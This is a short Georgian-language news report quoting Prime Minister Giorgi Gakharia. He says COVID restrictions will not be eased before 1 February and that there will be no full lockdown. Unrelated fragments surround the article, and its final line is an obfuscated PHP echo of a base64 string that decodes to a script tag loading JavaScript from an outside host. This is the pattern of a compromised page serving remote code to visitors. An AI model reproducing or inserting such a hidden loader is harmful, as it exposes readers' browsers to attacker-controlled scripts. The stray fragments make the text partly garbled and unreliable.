celsiusi
ავერსი შნაიდერი
საქართველოს პრემიერ მინისტრის განცხადებით, შეზღუდვების შემსუბუქება 1 თებერვლამდე არ განიხილება. ამის შესახებ გიორგი გახარიამ საკოორდინაციო საბჭოს შემდეგ გამართულ ბრიფინგზე ჟურნალისტების კითხვების საპასუხოდ განაცხადა.
 
„რეალური შემსუბუქება იმისთვის, რომ შედარებითი პროგრესი ეპიდემიოლოგიური მდგომარეობის მართვაში იყოს მდგრადი, შესაძლებელია განხილულ იყოს 1 თებერვლიდან, უფრო ადრე ეს ყველაფერი რისკის ქვეშ აყენებს იმ მიღწევებს, რომელიც ჩვენ გვაქვს“, - განაცხადა მთავრობის მეთაურმა.
 
გიორგი გახარიამ ამავე ბრიფინგზე აღნიშნა, რომ შეზღუდვებში არაფერი იცვლება და „არანაირი სრული ლოქდაუნი არ იქნება“.
 
„არ იქნება არანაირი შეზღუდვა ავტომობილებით, ან ფეხით. ერთადერთი, რაც 24 დეკემბრიდან გაიხსნა სავაჭრო ობიექტები, ისინი დაიხურება. სხვა შეზღუდვები ქვეყანაში არ იქნება, მათ შორის არც გადაადგილების. სრული ლოქდაუნის საჭიროება ქვეყანაში არ არსებობს“, - განაცხადა გიორგი გახარიამ.
2326
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");